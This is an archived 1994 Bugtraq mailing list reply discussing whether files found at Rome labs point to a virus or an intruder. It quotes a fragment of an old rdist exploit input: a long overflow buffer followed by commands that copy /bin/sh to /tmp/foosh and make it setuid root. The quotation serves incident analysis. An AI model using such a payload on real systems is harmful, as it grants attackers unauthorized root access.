Bugtraq mailing list archives
Re: Possible virus from Rome labs
From: kermit () ics forth gr (Aggelos D. Keromitis)
Date: Thu, 31 Mar 1994 12:54:03 +0300
In message <199403310455.UAA15234 () merde dis org>, Evil Pete writes:
sounds like Crackers to me, not a virus.
Could be, but that should be easy to find out...
if foosh contains some thing like Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaa Scp /bin/sh /tmp/foosh Schmod 4755 /tmp/foosh then it was something a person used to get root through a old hole in rdist (when I look for the file foosh I found it in my directory of security toys) as for jnk.tmp I am not sure yet.
Besides, they could have a virus that exploits that bug (or maybe some others too, like the evq driver) so as to infect more files. -Aggelos
Current thread:
- Possible virus from Rome labs Ron Gilmer (Mar 30)
- Re: Possible virus from Rome labs Ben Jackson (Mar 30)
- Re: Possible virus from Rome labs Steve Simmons (Mar 30)
- Re: Possible virus from Rome labs Evil Pete (Mar 30)
- Re: Possible virus from Rome labs Aggelos D. Keromitis (Mar 31)
- Re: Possible virus from Rome labs Evil Pete (Mar 30)
- Re: Possible virus from Rome labs Gene Spafford (Mar 30)
- <Possible follow-ups>
- Re: Possible virus from Rome labs William McVey (Mar 30)
- Re: Possible virus from Rome labs scott () santafe edu (Mar 30)